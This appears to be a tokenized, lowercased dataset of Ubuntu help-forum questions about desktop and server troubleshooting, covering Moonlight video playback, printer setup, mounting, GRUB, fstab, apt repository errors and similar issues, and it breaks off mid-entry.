20675	how to use moonlight to play videos on rtlmost.hu ?	in hungary , the biggest tv channel is rtl klub , they has a video archive site . they use silverlight instead of flash : ( what is annoying , they use the lastest version of silverlight , about 4.x . but moonlight does n't support it yet . i 've been tried in google chrome ( last dev version ) , and in firefox ( last stable version ) , and i 've been used the both versions of moonlight , the lastest stable , and the prerelease . the player loader is displayed , and loaded , but no player displayed after 30 mins waiting . if i want to switch to ubuntu completly , how can i manage to play these videos ? thanks for your anwsers . testvideo here . and this is a working video for me . also reported to moonlight developers , here . debug info : source : http : //www.rtlklub.hu/most/player/soda/sodamediacenter.player.rtl.v3.5.xap width : 555px height : 490px background : # runtimeversion : 4.0.50826.0 windowless : no maxframerate : 60 codecs : ms-codecs build configuration : debug , sanity checks prereleased firefox output with wincodecs installed : $ firefox http : //www.rtlklub.hu/most/17345_hirado_lelki_terror_-_elrabloi_tobbszor_eljatszottak_hogy_ki moonlight : 2.99.0.10 moonlight : attempting to load libmoonloaderxpi debug_get_option : gallium_driver = softpipe could n't open libtxc_dxtn.so , software dxtn compression/decompression unavailable moonlight : no audio capture service available moonlight : installing signal handlers for crash reporting . moonlight : enabling mono_debug=keep-delegates , reverse-pinvoke-exceptions and moonlight_enable_console=1 windowless mode using the ff3 bridge moonlight : plugin appdomain creation : ok moonlight : plugin appdomain creation : ok moonlight : url = http : //www.rtlklub.hu/most/17345_hirado_lelki_terror_-_elrabloi_tobbszor_eljatszottak_hogy_ki moonlight : url = http : //www.rtlklub.hu/most/player/soda/sodamediacenter.player.rtl.v3.5.xap debug_get_bool_option : gallium_nosse = false debug_get_bool_option : gallium_dump_fs = false debug_get_bool_option : softpipe_dump_gs = false debug_get_bool_option : draw_fse = false debug_get_bool_option : draw_no_fse = false debug_get_bool_option : gallium_dump_vs = false debug_get_bool_option : sp_no_rast = false debug_get_bool_option : gallium_nosse = false using managed xaml parser . exception while parsing reader ( 19:26 ) : system.windows.markup.xamlparseexception : could not convert attribute value '0.375 ' on element gradientstop . at mono.xaml.xamlparser.parseattributevalue ( mono.xaml.xamlobjectelement element , mono.xaml.xamlpropertysetter property ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseattribute ( mono.xaml.xamlobjectelement element ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseelementattributes ( mono.xaml.xamlobjectelement element ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseobjectelement ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseelement ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parsereader ( system.io.textreader stream ) [ 0x00000 ] in < filename unknown > :0 system.windows.markup.xamlparseexception : caught exception : could not convert attribute value '0.375 ' on element gradientstop . at mono.xaml.xamlparser.parsereader ( system.io.textreader stream ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.sl4xamlloader.hydrateinternal ( system.object value , system.io.stream xaml , boolean createnamescope , boolean validatetemplates , boolean import_default_xmlns ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlloader.hydrate ( system.object value , system.io.stream stream ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) mono.xaml.xamlloader : hydrate ( object , system.io.stream ) at system.windows.application.loadcomponent ( system.object component , system.uri resourcelocator ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.mainpage.initializecomponent ( ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.mainpage..ctor ( idictionary`2 initparams ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.app.application_startup ( system.object sender , system.windows.startupeventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.application.onstartup ( system.windows.startupeventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.createapplication ( ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.loadassemblies ( ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.initializedeployment ( intptr plugin , system.string xappath , system.string culture , system.string uiculture ) [ 0x00000 ] in < filename unknown > :0 moonlight : erroreventargs created with message : 'caught exception : could not convert attribute value '0.375 ' on element gradientstop . ' ( firefox-bin:11629 ) : moonlight-warning ** : ( plugin-class.cpp:609 ) : static void moonlight : :eventlistenerproxy : :proxy_listener_to_javascript ( moonlight : :eventobject* , moonlight : :eventargs* , void* ) : runtime check failed : ( js_sender ! = null ) not implemented : ( erroreventargs.linenumber ) plugin-class.cpp:842 not implemented : ( erroreventargs.methodname ) plugin-class.cpp:855 windowless mode using the ff3 bridge moonlight : plugin appdomain creation : ok moonlight : plugin appdomain creation : ok shutting down moonlight : url = http : //www.rtlklub.hu/most/17345_hirado_lelki_terror_-_elrabloi_tobbszor_eljatszottak_hogy_ki moonlight : url = http : //www.rtlklub.hu/most/player/soda/sodamediacenter.player.rtl.v3.5.xap debug_get_bool_option : gallium_nosse = false debug_get_bool_option : gallium_dump_fs = false debug_get_bool_option : softpipe_dump_gs = false debug_get_bool_option : sp_no_rast = false using managed xaml parser . exception while parsing reader ( 19:26 ) : system.windows.markup.xamlparseexception : could not convert attribute value '0.375 ' on element gradientstop . at mono.xaml.xamlparser.parseattributevalue ( mono.xaml.xamlobjectelement element , mono.xaml.xamlpropertysetter property ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseattribute ( mono.xaml.xamlobjectelement element ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseelementattributes ( mono.xaml.xamlobjectelement element ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseobjectelement ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parseelement ( ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlparser.parsereader ( system.io.textreader stream ) [ 0x00000 ] in < filename unknown > :0 system.windows.markup.xamlparseexception : caught exception : could not convert attribute value '0.375 ' on element gradientstop . at mono.xaml.xamlparser.parsereader ( system.io.textreader stream ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.sl4xamlloader.hydrateinternal ( system.object value , system.io.stream xaml , boolean createnamescope , boolean validatetemplates , boolean import_default_xmlns ) [ 0x00000 ] in < filename unknown > :0 at mono.xaml.xamlloader.hydrate ( system.object value , system.io.stream stream ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper remoting-invoke-with-check ) mono.xaml.xamlloader : hydrate ( object , system.io.stream ) at system.windows.application.loadcomponent ( system.object component , system.uri resourcelocator ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.mainpage.initializecomponent ( ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.mainpage..ctor ( idictionary`2 initparams ) [ 0x00000 ] in < filename unknown > :0 at skyinteractive.media.web.player.rtl.app.application_startup ( system.object sender , system.windows.startupeventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.application.onstartup ( system.windows.startupeventargs e ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.createapplication ( ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.loadassemblies ( ) [ 0x00000 ] in < filename unknown > :0 at system.windows.deployment.initializedeployment ( intptr plugin , system.string xappath , system.string culture , system.string uiculture ) [ 0x00000 ] in < filename unknown > :0 moonlight : erroreventargs created with message : 'caught exception : could not convert attribute value '0.375 ' on element gradientstop . ' ( firefox-bin:11629 ) : moonlight-warning ** : ( plugin-class.cpp:609 ) : static void moonlight : :eventlistenerproxy : :proxy_listener_to_javascript ( moonlight : :eventobject* , moonlight : :eventargs* , void* ) : runtime check failed : ( js_sender ! = null ) not implemented : ( erroreventargs.linenumber ) plugin-class.cpp:842 not implemented : ( erroreventargs.methodname ) plugin-class.cpp:855 shutting down note : child process received `goodbye ' , closing down
20680	what does it mean to mount something ?	i hear and read the term all the time , but what does it mean ? i just accidentally mounted a shared folder hosted on a remote computer . the only difference i see is the presence of a desktop shortcut . i was able to access the folder before i mounted it with no problems . so what does it mean to mount something ?
20688	set up printing with a networked lpr printer ?	i 'm trying to set up printing to a networked lpr printer , but i ca n't seem to make it work . the connexion information that it gives is : print spooler : printing.domain.edu printer name : printername print port : 515 bidirectional : disabled it 's an hp laserjet p4015x , and i 'm using the `` hp laserjet p4015x , hpcups 3.10.6 ( color , 2-sided printing ) '' driver , according to cups . i have tried installing via the cups admin interface as lpd : //printing.domain.edu:515/printername , lpd : //printing.domain.edu/printername , and http : //printing.domain.edu:515/printername , and none of these has worked ( i.e . test pages show up as `` stopped '' ) .
20689	what does add-apt-repository mean ?	what does this mean ? sudo add-apt-repository ppa : maco.m/ruby sudo apt-get update sudo apt-get install rubygems hows does it differ from running sudo apt-get install rubygems thanks .
20690	monitor wo n't enter power save mode	my lcd monitor wo n't enter power save mode . i 've gone into system â preferences â screensaver , clicked power management , then set put display to sleep when inactive for : to 10 minutes ( for both on ac power and on battery power ) , but the monitor still does n't enter power save mode , even after an hour . anyone have ideas on what to try ? i 'm using ubuntu 10.04.1 lts 64-bit desktop on a dell latitude e6400 laptop . update sun jan 16 01:02:45 pst 2011 : i forgot to mention the laptop is docked , and the monitor is connected via dvi cable to the dock . i have n't tried waiting for power save mode using a vga cable or no dock .
20693	how to setup nx server and client ?	i installed nx server on my desktop and able to run it successfully following this tutorial : http : //michigantelephone.wordpress.com/2007/10/15/how-to-install-nx-server-and-client-under-ubuntukubuntu-linux/ when i run the command sudo /usr/nx/bin/nxserver âstatus i am seeing the following output : nx > 900 connecting to server .. nx > 110 nx server is running . nx > 999 bye . it means i have setup nx server correctly.. but on other machine when i open nx client it is asking for hostname..what name should i give there ? every tutorial is explaining about how to install and start nx server but not about how to connect to the server from client.. could you guys please help me ? thanks in advance deter
20694	using extra features on mac & idevice supported headphones	i bought some headphones and was wondering if i could find any drivers that could support the mic , the volume buttons , and playlist navigation button . i am not positive , but the drivers used by the apple headphones may work for this , but i do n't know where i can find these kind of drivers .
20698	battery status not showing	how do i keep the battery status on as to see how much life is left in my battery ? i configured this to be on all the time in the power management but it only shows the amount left when i am charging the battery . when i am unplugged , i do n't get the battery status . thanks for any help you can provide .
20699	equipment maintenance tracking software	i need software for equipment maintenance tracking , i am thinking of designing an openoffice.org base database for this but it would probably save me a lot of time if something already exist to do this that is freely available . i would be happy if someone could point me to something , even if the software was not designed specifically for equipment maintenance tracking but could be repurposed in some way .
20705	is the bfs scheduler better than completely fair scheduler for desktop computing ?	what are the advantages of bfs over cfs and are there any benchmarks to see if there are any real performance gains ?
20707	what 's the default traditional chinese font ?	the only fonts that can render chinese text are : wenquanyi micro hei , wenquanyi micro hei mono , droid sans ( i think is unicode ) , freesans ( i think is unicode too ) . changing chinese text to sans , freesans , droid sans render the same font ) . wenquanyi micro hei , wenquanyi micro hei mono render 'bolder ' chinese text . edit : what i discovered so far : is not wenquanyi micro hei , wenquanyi micro hei , droid sans fallback ( droid with cjk support ) . it can only be freesans , or deja vu sans . i 'm not sure which one is being used as default one ( clean installation ) any idea ?
20709	rsnapshot for remote backups ?	i want to use rsnapshot to make backups from my production server to a remote backups server . should i install rsnapshot on the remote backup server and not the production one , right ? rsnapshot is going to pull the files to backup from the production server and store them locally on the backup server ? i 've just realized that i do n't have sudo privilegies on the backup server . does this mean i can not use rsnapshot for remote backups ? by the way , is n't a pity i ca n't use rsnapshot with a backup space service offered by my hosting provider , just because i have not full control on the backup server , but only on the production one ?
20710	merging /boot and rearranging grub2 entries	i have used 10.10 and now for testing purposes installed 10.04 to a separate partition . 10.10 is currently on a single partition , while for 10.04 i decided to separate /boot to a third partition . now my questions : how can i move and merge 10.10 's /boot on the new /boot partition what do i have to modify to rearrange the ( automatic ) entries ? how can i have the entries contain the distribution name to reduce confusion ? how can i make sure the grub configuration stays identical when either distribution updates ?
20712	can i merge /home for 10.10 and 10.04	or what can go wrong regarding config files ? i have an old installation of 10.10 and for testing purposes want 10.04 in parallel , i 'd like to use my 10.10 gnome & al configuration there without crashing something
20716	network connection delay after installing indicator-network	ok , so here 's the thing , i installed wingpanel in ubuntu 10.10 , i removed the gnome-panels ( yes , both ) . in the wingpanel itself there 's no network indicator , so i google it and in some forums , some guy wrote that you have to install indicator-network . i did it , and it solved the network indicator in the wingpanel , but now every time i turn on my computer , the connection takes like 2 minutes or more to connect , when before installing this thing it did it immediately . how can i solve this ? any help ?
20719	upgrade ubuntu 10.04 to ubuntu 10.10	i 'm new to these forums so i 'll be quick . when i try to upgrade to ubuntu 10.10 from 10.04 i get this error , i have tried upgrading from terminal and update manager as well . could not determine the upgrade an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug against the 'update-manager ' package and include the files in /var/log/dist-upgrade/ in the bug report . restoring original system state thanks aborting
20720	mount of file system failed . -- after upgrading from 9.04 to 9.10	after upgrading from ubuntu 9.04 to 9.10 i am getting this message on boot up : mount of file system failed . a maintenance shell will now be started . control-d will terminate this shell and retry . myusername @ root : ~ $ after searching in google , i found out that i have to run the command fsck on the os partition from ubuntu live cd.. here are my questions : 1 ) i dont know in which partition my ubuntu os is installed.. ( those are not user-friendly drive names to remember right : ) ) -- is there any command to know in which partition my ubuntu os is installed ? 2 ) can i do this from ubuntu 10.04 live cd ? thanks in advance edit : first , when i booted the live cd ( 10.04 ) and opened the file system , i dont see the uuid in the title.. and one more thing that /etc/fstab file has just three lines : 1 ) aufs /aufs rw 0 0 2 ) tmpfs /tmp nosuid , nodev 0 0 3 ) /dev/sda7 swap swap defaults 0 0 i dont know what to do..can u help me here are the screen shots :
20723	live cd does n't boot , drops to busy box shell	i am a windows user and i 'm keen to shift to linux , so i made live cd of ubuntu 10.10 ( maverick ) . this is my very first time to use ubuntu . i put cd in the drive and set the bios to boot it , and the ubuntu cd worked and logo of ubuntu appears on screen . but suddenly before the start up screen it shows this : busybox v1.5 ( ubuntu 1:1.15.31 ubuntu5 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . when i type help and press enter , the list of commands appear like below : alias break cd chdir command continue echo eval exec export ... this is my first time so i have no idea what to do . i restarted my pc several times but it happens every time . please help me . what should i do ?
20725	gpg error : the following signatures could n't be verified because the public key is not available	after sudo apt-get update i get this error : w : gpg error : http : //archive.hivemind.me all release : the following signatures could n't be verified because the public key is not available : no_pubkey 3c962022012520a0 i do n't know even what this pubkey is for . how can i solve this . thanks
20727	is there any way to adjust the width of taskbar items on gnome desktop ?	is there any way in which the width of items on the taskbar ( or , rather , the lower panel ) of the gnome ( 2.32.0 ) desktop ( ubuntu 10.10 ) can be adjusted to take a more sensible width ? while i can see the icons of the applications they represent , they seem a little over-compressed , given the width of the desktop/monitor resolution ( 1900 x 1080 ) : click the image , or this link , for a full-sized ( 1920x169 , 169.7kb ) graphic .
20728	how can i auto align desktop icons on right side ?	i keep my docky dock on left side of desktop and it overlaps desktop icons and their names when intellihide mode is on . is there a way to align desktop icons on right side always , mac style ?
20737	is there a touch-friendly casino gambling ( poker , roulette , slot machine ) application that interfaces with coin acceptors	does anyone have experience with gambling games ( roulette , poker and so on ) on ubuntu ? i would like to setup a touchscreen kiosk in my home with ubuntu ... anything that works with coin and cash acceptors , reports payouts , lets the administrator set payout rates and so on any experiences/hints ? i am interested in full statistics / pay tweakings / cash flow analysis..
20739	is it possible to save output from a command to a file after the command already has been executed ?	does an elegant way exist to save the output of a command to a file after the command has been run , with the terminal window is open ? i mean once the command has been executed in the terminal . the output is still there in terminal . now i could copy & paste all the lines and save it to a file . but perhaps does a method exist to somehow write the output buffer of a terminal window to a file or even better the output of an already executed command ?
20743	automatically launch gksudo when user does n't have write permissions ?	is it possible to automatically launch gksudo whenever i open a text file without write permissions in nautilus ? i often need to edit my /etc/hosts file and sometimes i forget to right click and select `` open as administrator '' .
20746	configuring pianobar proxy	i 've made a proxy as listed here is there any way to make pianobar use that so i can connect to pandora ? i 'm outside the us .
20748	emacs keybindings for textboxes in firefox ?	i 'm so used to emacs that sometimes , when i 'm typing something in a textbox in firefox , i sometimes try and do c-p to move up a line . it is seriously annoying to have to cancel a print dialog box every time i try and move about my text . if it 's not horrendously complicated , i 'd like to have keybindings that emulate emacs inside textboxes in firefox ... obviously , i would n't need all the keybindings , but movement , marking , killing and yanking would be useful . is this an insane request ?
20750	automatically mount sshfs on startup ?	is it possible to automatically mount a sshfs filesystem whenever the connection goes up ?
20752	how can i search within a manpage ?	is there a option to search within manpages ?
20754	mutter slows down my system	my ubuntu ( 10.10 , netbook remix , unity ) almost freezes from time to time . as far as i 've investigated , the problem is with mutter . then i run pkill mutter it restarts window manager and system becomes fast again . mutter eats like ~15-20 % of my memory ( 2 gb ) . what can i do about it ? i just hate the situation . maybe i should just add this command ( pkill mutter ) to crontab or something
20759	system overrides my mount parameters in /etc/fstab	[ ... /~ ] $ mount /dev/sda4 on / type ext4 ( rw , commit=60 , commit=0 ) [ ... /~ ] $ cat /etc/fstab # unconfigured fstab for base system uuid=70739c04-fcb6-4747-803c-824f9c894f41 / ext4 defaults , commit=60 0 1 what can i do about it ? it seems strange . i want to be able to set any commit time i want edit : added /proc/mounts contents [ ... /~ ] $ cat /proc/mounts rootfs / rootfs rw 0 0 none /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 none /proc proc rw , nosuid , nodev , noexec , relatime 0 0 none /dev devtmpfs rw , relatime , size=886332k , nr_inodes=221583 , mode=755 0 0 none /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 fusectl /sys/fs/fuse/connections fusectl rw , relatime 0 0 /dev/disk/by-uuid/70739c04-fcb6-4747-803c-824f9c894f41 / ext4 rw , relatime , barrier=1 , data=ordered 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 none /dev/shm tmpfs rw , nosuid , nodev , relatime 0 0 none /var/run tmpfs rw , nosuid , relatime , mode=755 0 0 none /var/lock tmpfs rw , nosuid , nodev , noexec , relatime 0 0 /dev/sda3 /media/megahard fuseblk rw , nosuid , nodev , relatime , user_id=0 , group_id=0 , allow_other , blksize=4096 0 0 cgroup /dev/cgroup/cpu cgroup rw , relatime , cpu , release_agent=/usr/local/sbin/cgroup_clean 0 0 gvfs-fuse-daemon /home/va1en0k/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , relatime , user_id=1000 , group_id=1000 0 0 another edit : [ ... /~ ] $ cat /etc/mtab /dev/sda4 / ext4 rw , commit=60 , commit=0 0 0 none /proc proc rw , noexec , nosuid , nodev 0 0 none /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 none /dev devtmpfs rw , mode=0755 0 0 none /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 none /dev/shm tmpfs rw , nosuid , nodev 0 0 none /var/run tmpfs rw , nosuid , mode=0755 0 0 none /var/lock tmpfs rw , noexec , nosuid , nodev 0 0 /dev/sda3 /media/megahard fuseblk rw , nosuid , nodev , allow_other , blksize=4096 0 0 cgroup /dev/cgroup/cpu cgroup rw , cpu 0 0 gvfs-fuse-daemon /home/va1en0k/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=va1en0k 0 0
20760	ca n't add networkmanager applet to gnome panel	i have researched this problem extensively and i ca n't seem to find an answer . in ubuntu 10.04 lts , i want to connect to my vpn through the networkmanager applet . i installed all the network manager packages , including the gnome client . i understand i need to add the `` notification area '' to the panel , which i have done . i checked that the networkmanager is running : nate @ nate-desktop : ~ $ service network-manager status network-manager start/running , process 763 in /etc/networkmanager/nm-system-settings.conf , i have added managed=true ( do n't know if this matters , but i saw it suggested on one forum ) : nate @ nate-desktop : ~ $ more /etc/networkmanager/nm-system-settings.conf # this file is installed into /etc/networkmanager , and is loaded by # networkmanager by default . to override , specify : ' -- config file ' # during nm startup . this can be done by appending to daemon_opts in # the file : # # /etc/default/networkmanager # [ main ] plugins=ifupdown , keyfile [ ifupdown ] # managed=false managed=true i restarted networkmanager and tried rebooting , too . at this point , it looks like networkmanager is running but it 's not appearing in the notificationarea of the panel . i do n't know what else to try . any ideas ?
20765	i ca n't remove lucida grande from ubuntu 10.10	i installed lucida grande but now i want to remove it . i checked usr/share/font folder but i still ca n't find the font . any suggestion to remove the font ? ( i searched for the file : lucida grande.ttf but still ca n't find anything )
20766	what does `` burn the image directly without saving it to disc '' mean ?	i am burning an audio cd in brasero , and so i 've clicked burn and a window comes up with one of the options asking if i want to `` burn the image directly without saving it to disc '' . what does this mean ?
20767	how to disable laptop internal keyboard	i am using external usb keyboard . i want to disable laptop 's internal keyboard using software . i know that i can just remove the internal keyboards wire and disconnect it physically , but i wanted to disable it using software so that later i can enable it by just executing a command in terminal easily . i am talking about disabling the keyboard and not the keyboard layout . i am having hp-compaq presario a965 tu laptop intel centrino core 2 duo ( freq . 2 ghz ) . i am using 64 bit ubuntu lucid lynx .
20773	evolution and thunderbird sharing same mail data ?	i have been using evolution for a quite long and it has downloaded around 1.6gbs of mails from gmail . i want to try thunderbird but i dont want to re download everything again . is that possible to have both clients sharing same data ? i 'll make sure i do n't use both at the same time if that matters . i 'll move to thunderbird fully if i 'm happy with it . problems i face with evolution is that i have to have the gui running always if i want to get instant alerts and send mail immediately . also it loads the messages slow and even after i move to the next mail , it slowly downloads all the linked images before moving on .
20774	language indicator does n't show current language	i have chosen to write in 3 languages . i change them with the command shift + alt and it changes , but i can not see in what language i write in the language indicator in my panel . can you help ?
20782	losing visual effects settings after reboot	i recently upgraded to ubuntu 10.10 from 10.04 and ran into a problem . if i right click on my desktop , select change background it takes me to the appearance preferences and then i go to the visual effects tab to change my effects from none to normal , now this all works fine , as soon as i restart my computer it changes back to none again , does anyone know how come this is and how i can solve this ?
20783	how is the /tmp directory cleaned up ?	how is the /tmp directory cleaned up ? is it automatic ? if so , how frequently is it cleaned up ?
20784	youtube video streaming slow	when i try to stream youtube videos on my ubuntu 11.04 , they do n't stream smoothly . they buffer well and are choppy . here 's my config : laptop : gateway nv58 ram : 4 gb ethernet controller : broadcom corp netlink bcm5784m gigabit ethernet pcie ( rev10 ) let me know if you need more details . output of lspci : 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation ich9m/m-e sata ahci controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm5784m gigabit ethernet pcie ( rev 10 ) 04:00.0 network controller : intel corporation wifi link 5100
20788	is gnome itself considered `` software '' ?	the gnome project aims to provide the user with a desktop environment , and it does consist of many pieces of software . there indeed is a foundation called the gnome foundation , and there is a desktop environment called gnome , but well , can gnome itself be called software ?
20790	remove windows borders ( like in lxde )	i have a small screen ( 1280x800 ) and do n't like to waste space . is there a way to remove a title bar and the frames of the windows themselves ? the buttons on the title bare are easily replaced by keyboard shortcuts . i used to be able to do it in lxde and really liked it . any suggestions ?
20791	aptitude update gives 404 's for intrepid	i 'm having issues trying to update my packages . i have n't used this server since last september and now i 'm getting 404 errors on all the intrepid repos . how do i fix this ? thanks aptitude update err http : //security.ubuntu.com intrepid-security/main packages 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com intrepid-security/restricted packages 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com intrepid-security/main sources 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com intrepid-security/restricted sources 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com intrepid-security/universe packages 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com intrepid-security/universe sources 404 not found [ ip : 91.189.92.166 80 ] ign http : //us.archive.ubuntu.com intrepid-updates/multiverse packages ign http : //us.archive.ubuntu.com intrepid-updates/multiverse sources err http : //us.archive.ubuntu.com intrepid/main packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/restricted packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/main sources 404 not found [ ip : 91.189.88.31 80 ] err http : //security.ubuntu.com intrepid-security/multiverse packages 404 not found [ ip : 91.189.92.166 80 ] err http : //us.archive.ubuntu.com intrepid/restricted sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/universe packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/universe sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/multiverse packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid/multiverse sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/main packages 404 not found [ ip : 91.189.88.31 80 ] err http : //security.ubuntu.com intrepid-security/multiverse sources 404 not found [ ip : 91.189.92.166 80 ] err http : //us.archive.ubuntu.com intrepid-updates/restricted packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/main sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/restricted sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/universe packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/universe sources 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/multiverse packages 404 not found [ ip : 91.189.88.31 80 ] err http : //us.archive.ubuntu.com intrepid-updates/multiverse sources 404 not found [ ip : 91.189.88.31 80 ] reading package lists ... sources.list # # deb cdrom : [ ubuntu-server 8.10 _intrepid ibex_ - release i386 ( 20081028.1 ) ] / intrepid main restricted # deb cdrom : [ ubuntu-server 8.10 _intrepid ibex_ - release i386 ( 20081028.1 ) ] / intrepid main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ intrepid main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ intrepid universe deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid universe deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ intrepid multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid multiverse deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-backports main restricted universe multiverse # deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . this software is not part of ubuntu , but is # # offered by canonical and the respective vendors as a service to ubuntu # # users . # deb http : //archive.canonical.com/ubuntu intrepid partner # deb-src http : //archive.canonical.com/ubuntu intrepid partner deb http : //us.archive.ubuntu.com/ubuntu/ intrepid-security main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ intrepid-security main restricted deb http : //us.archive.ubuntu.com/ubuntu/ 